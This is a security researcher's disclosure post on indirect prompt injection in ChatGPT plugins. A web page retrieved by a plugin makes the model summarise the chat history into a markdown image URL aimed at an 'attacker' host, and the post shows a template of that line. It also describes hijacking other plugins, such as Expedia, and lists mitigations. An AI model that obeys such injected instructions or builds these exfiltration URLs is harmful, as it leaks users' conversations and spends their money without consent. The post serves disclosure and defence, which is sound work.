This post shows how a malicious website can take control of a ChatGPT chat session and exfiltrate the history of the conversation.
Plugins, Tools and Integrations
With plugins, data exfiltration can happen by sending too much data into the plugin in the first place. More security controls and insights on what is being sent to the plugin are required to empower users.
However, this post is not about sending too much data to a plugin, but about a malicious actor who controls the data a plugin retrieves.
Untrusted Data and Markdown Injection
The individual controlling the data a plugin retrieves can exfiltrate chat history due to ChatGPT’s rendering of markdown images.
Basically, if the LLM returns a markdown image in the form of
![data exfiltration in progress](https://attacker/q=*exfil_data*)
ChatGPT will render it automatically and retrieve the URL. During an Indirect Prompt Injection the adversary controls what the LLM is doing (I call it AI Injection for a reason), and it can ask to summarize the past history of the chat and append it to the URL to exfiltrate the data.
I’m not the only one who points this out, Roman Samoilenko has observed and posted about this vulnerability in ChatGPT before. Roman found it end of March, and I ran across it independently a few days later in early April.
Proof of Concept Demonstration
This is possible with plugins, e.g. via the
WebPilot Plugin or check out the YouTube Transcript Plugin Injection I posted about the other day.
The LLM’s response can contain markdown (or instruct the AI to build it on the fly), summarize the past conversation, URL encode that summary and append that as query parameter. And off it goes to the attacker.
Here is how this looks in action:
The text that is being exfiltrated including “TooManySecrets123” is something that was written earlier in the chat conversation.
And here is an end to end video POC:
Feel free to skip forward in the middle section - it’s a bit slow.
But wait, there is more….
Can an attacker call another Plugin during the injection?
Short answer is yes.
This is an interesting variant of
Cross Site Request Forgery actually, but we will need a new name for it, maybe
Cross Plugin Request Forgery.
Here is an example of an Indirect Prompt Injection calling another plugin (Expedia) to look for flights:
Yes, random webpages and comments on sites will soon hijack your AI and spend your money.
Mitigations and Suggestions
Safe AI assistants would be really awesome to have, the power of ChatGPT is amazing! So what could be done to improve the security posture?
- Its unclear why plugins have access to the entire conversation context. This could be isolated. It would be better if plugins go off do their work, rather then giving it access to the entire conversation history, or allow invoking other plugins.
- A security contract for plugins is needed. Who is responsible for what? What data is sent to the plugin? Currently there is no defined or enforced schema that could help mitigate such problems. Open AI mentions Human in the loop as a core safety best practice, but end-users have little to no control at the moment once they start using plugins.
- In fact the idea of having some sort of kernel LLM and other sandbox LLM is discussed by Simon Willison, who has thought about this already in a lot more detail.
- NVIDIA has been working on NeMo GuardRails to help keep bots in check
- Scenarios like rendering images could be implemented as a dedicated feature, rather than depending on the convenience of markdown. (e.g. links being returned that are not injected into the chat context, but as references after the main message).
- Only use and point plugins to data you fully trust.
A lot more research is needed, both from offensive and defensive side. And at this point, with the speed of adoption and new tools being released it seems that raising awareness to have more smart people look into this (and how to fix it) is the best we can do.
With the advent of plugins Indirect Prompt Injections are now a reality within ChatGPT’s ecosystem. As attacks evolve we will probably learn and see nefarious text and instructions on websites, blog posts, comments,.. to attempt to take control of your AI.
I first disclosed the image markdown injection issue to Open AI on April, 9th 2023.
After some back and forth, and highlighting that plugins will allow to exploit this remotely, I was informed that image markdown injection is a feature and that no changes are planned to mitigate this vulnerability.